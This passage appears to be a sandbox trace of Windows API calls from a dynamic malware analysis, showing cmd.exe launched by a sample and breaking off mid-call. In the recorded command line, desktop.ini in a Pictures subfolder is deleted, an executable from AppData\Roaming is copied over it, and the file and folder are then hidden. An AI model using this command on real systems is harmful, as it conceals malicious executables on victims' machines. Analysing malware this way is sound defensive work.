ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ee04 | out: phkResult=0x18ee04*=0x40) returned 0x0 [0145.255] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x0, lpData=0x18ee10*=0x50, lpcbData=0x18ee08*=0x1000) returned 0x2 [0145.255] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x4, lpData=0x18ee10*=0x1, lpcbData=0x18ee08*=0x4) returned 0x0 [0145.255] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x0, lpData=0x18ee10*=0x1, lpcbData=0x18ee08*=0x1000) returned 0x2 [0145.255] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x4, lpData=0x18ee10*=0x0, lpcbData=0x18ee08*=0x4) returned 0x0 [0145.255] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x4, lpData=0x18ee10*=0x40, lpcbData=0x18ee08*=0x4) returned 0x0 [0145.255] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x4, lpData=0x18ee10*=0x40, lpcbData=0x18ee08*=0x4) returned 0x0 [0145.255] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x0, lpData=0x18ee10*=0x40, lpcbData=0x18ee08*=0x1000) returned 0x2 [0145.255] RegCloseKey (hKey=0x40) returned 0x0 [0145.255] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ee04 | out: phkResult=0x18ee04*=0x40) returned 0x0 [0145.255] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x0, lpData=0x18ee10*=0x40, lpcbData=0x18ee08*=0x1000) returned 0x2 [0145.255] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x4, lpData=0x18ee10*=0x1, lpcbData=0x18ee08*=0x4) returned 0x0 [0145.255] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x0, lpData=0x18ee10*=0x1, lpcbData=0x18ee08*=0x1000) returned 0x2 [0145.255] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x4, lpData=0x18ee10*=0x0, lpcbData=0x18ee08*=0x4) returned 0x0 [0145.255] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x4, lpData=0x18ee10*=0x9, lpcbData=0x18ee08*=0x4) returned 0x0 [0145.255] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x4, lpData=0x18ee10*=0x9, lpcbData=0x18ee08*=0x4) returned 0x0 [0145.255] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x0, lpData=0x18ee10*=0x9, lpcbData=0x18ee08*=0x1000) returned 0x2 [0145.255] RegCloseKey (hKey=0x40) returned 0x0 [0145.256] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886373 [0145.256] srand (_Seed=0x5b886373) [0145.256] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\"" [0145.256] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\"" [0145.256] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0145.256] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x341c00, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0145.256] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0145.256] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0145.256] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0145.256] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0145.256] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0145.256] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0145.256] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0145.256] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0145.256] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0145.256] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0145.256] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0145.256] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0145.256] GetEnvironmentStringsW () returned 0x3425f0* [0145.257] FreeEnvironmentStringsW (penv=0x3425f0) returned 1 [0145.257] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0145.257] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0145.257] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0145.257] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0145.257] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0145.257] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0145.257] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0145.257] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0145.257] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0145.257] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0145.257] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18fbd0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0145.257] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18fbd0, lpFilePart=0x18fbcc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18fbcc*="Desktop") returned 0x18 [0145.257] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0145.257] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f94c | out: lpFindFileData=0x18f94c) returned 0x340c80 [0145.257] FindClose (in: hFindFile=0x340c80 | out: hFindFile=0x340c80) returned 1 [0145.257] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f94c | out: lpFindFileData=0x18f94c) returned 0x340c80 [0145.257] FindClose (in: hFindFile=0x340c80 | out: hFindFile=0x340c80) returned 1 [0145.257] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f94c | out: lpFindFileData=0x18f94c) returned 0x340c80 [0145.258] FindClose (in: hFindFile=0x340c80 | out: hFindFile=0x340c80) returned 1 [0145.258] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0145.258] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0145.258] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0145.258] GetEnvironmentStringsW () returned 0x3404a0* [0145.258] FreeEnvironmentStringsW (penv=0x3404a0) returned 1 [0145.258] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0145.258] GetConsoleOutputCP () returned 0x1b5 [0145.258] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0145.258] GetUserDefaultLCID () returned 0x409 [0145.259] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0145.259] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18fd10, cchData=128 | out: lpLCData="0") returned 2 [0145.259] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18fd10, cchData=128 | out: lpLCData="0") returned 2 [0145.259] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18fd10, cchData=128 | out: lpLCData="1") returned 2 [0145.259] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0145.259] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0145.259] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0145.259] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0145.259] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0145.259] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0145.259] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0145.259] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0145.259] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0145.259] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0145.259] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0145.260] GetConsoleTitleW (in: lpConsoleTitle=0x330ac8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0145.260] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0145.260] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0145.260] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0145.260] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0145.261] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0145.261] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0145.261] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0145.261] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0145.261] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0145.261] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0145.261] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0145.263] _wcsicmp (_String1="del", _String2=")") returned 59 [0145.263] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0145.263] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0145.263] _wcsicmp (_String1="IF", _String2="del") returned 5 [0145.263] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0145.263] _wcsicmp (_String1="REM", _String2="del") returned 14 [0145.263] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0145.265] _wcsicmp (_String1="type", _String2=")") returned 75 [0145.265] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0145.265] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0145.265] _wcsicmp (_String1="IF", _String2="type") returned -11 [0145.265] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0145.265] _wcsicmp (_String1="REM", _String2="type") returned -2 [0145.265] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0145.270] SetErrorMode (uMode=0x0) returned 0x0 [0145.270] SetErrorMode (uMode=0x1) returned 0x0 [0145.270] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3404a8, lpFilePart=0x18f4c4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f4c4*="Desktop") returned 0x18 [0145.270] SetErrorMode (uMode=0x0) returned 0x1 [0145.270] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0145.270] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0145.274] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0145.275] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x18f240, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f240) returned 0xffffffff [0145.275] GetLastError () returned 0x2 [0145.275] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x18f240, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f240) returned 0xffffffff [0145.275] GetLastError () returned 0x2 [0145.275] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x18f240, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f240) returned 0x342530 [0145.275] FindClose (in: hFindFile=0x342530 | out: hFindFile=0x342530) returned 1 [0145.275] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x18f240, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f240) returned 0xffffffff [0145.276] GetLastError () returned 0x2 [0145.276] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x18f240, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f240) returned 0x342530 [0145.276] FindClose (in: hFindFile=0x342530 | out: hFindFile=0x342530) returned 1 [0145.276] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0145.276] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0145.276] GetConsoleTitleW (in: lpConsoleTitle=0x18f738, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0145.299] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f5c0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f688 | out: lpAttributeList=0x18f5c0, lpSize=0x18f688) returned 1 [0145.299] UpdateProcThreadAttribute (in: lpAttributeList=0x18f5c0, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f680, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f5c0, lpPreviousValue=0x0) returned 1 [0145.299] GetStartupInfoW (in: lpStartupInfo=0x18f57c | out: lpStartupInfo=0x18f57c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0145.299] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0145.300] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x18f61c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f668 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" ", lpProcessInformation=0x18f668*(hProcess=0x50, hThread=0x4c, dwProcessId=0x958, dwThreadId=0x98c)) returned 1 [0145.303] CloseHandle (hObject=0x4c) returned 1 [0145.303] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0145.303] GetEnvironmentStringsW () returned 0x3409d0* [0145.303] FreeEnvironmentStringsW (penv=0x3409d0) returned 1 [0145.303] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0145.344] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x18f55c | out: lpExitCode=0x18f55c*=0x0) returned 1 [0145.344] CloseHandle (hObject=0x50) returned 1 [0145.344] _vsnwprintf (in: _Buffer=0x18f6a4, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f568 | out: _Buffer="00000000") returned 8 [0145.344] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0145.345] GetEnvironmentStringsW () returned 0x342580* [0145.345] FreeEnvironmentStringsW (penv=0x342580) returned 1 [0145.345] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0145.345] GetEnvironmentStringsW () returned 0x342580* [0145.345] FreeEnvironmentStringsW (penv=0x342580) returned 1 [0145.345] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f5c0 | out: lpAttributeList=0x18f5c0) [0145.345] GetConsoleTitleW (in: lpConsoleTitle=0x18f940, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0145.345] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x18e9b8, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x18e9bc, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x18e9b8*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0145.345] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0145.346] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0145.346] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0145.346] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\desktop.ini")) returned 0xffffffff [0145.346] GetLastError () returned 0x2 [0145.346] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1")) returned 0x10 [0145.346] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0145.346] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0145.346] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\desktop.ini")) returned 0xffffffff [0145.346] GetLastError () returned 0x2 [0145.346] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x34360c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34360c) returned 0xffffffff [0145.346] GetLastError () returned 0x2 [0145.346] _get_osfhandle (_FileHandle=2) returned 0xb [0145.346] GetFileType (hFile=0xb) returned 0x2 [0145.346] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0145.346] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f3b8 | out: lpMode=0x18f3b8) returned 1 [0145.347] _get_osfhandle (_FileHandle=2) returned 0xb [0145.347] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x18f3ec | out: lpConsoleScreenBufferInfo=0x18f3ec) returned 1 [0145.347] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0145.347] _get_osfhandle (_FileHandle=1) returned 0x7 [0145.347] _get_osfhandle (_FileHandle=1) returned 0x7 [0145.347] _get_osfhandle (_FileHandle=1) returned 0x7 [0145.347] GetFileType (hFile=0x7) returned 0x2 [0145.347] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0145.347] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18fadc | out: lpMode=0x18fadc) returned 1 [0145.348] _dup (_FileHandle=1) returned 3 [0145.348] _close (_FileHandle=1) returned 0 [0145.348] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini", _String2="con") returned -53 [0145.348] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x18faac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0145.351] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0145.351] GetConsoleTitleW (in: lpConsoleTitle=0x18f8dc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0145.351] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x18f440, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f440) returned 0x340820 [0145.351] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0145.351] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0145.351] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0145.352] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18e34c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0145.352] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0145.352] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.352] GetFileType (hFile=0x58) returned 0x1 [0145.352] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.352] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x18e3a4 | out: lpFileSizeHigh=0x18e3a4*=0x0) returned 0x7d600 [0145.352] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.352] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.352] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.352] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.352] GetFileType (hFile=0x50) returned 0x1 [0145.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.352] GetFileType (hFile=0x50) returned 0x1 [0145.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.352] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.354] GetFileType (hFile=0x50) returned 0x1 [0145.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.354] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.354] GetFileType (hFile=0x50) returned 0x1 [0145.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.354] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, 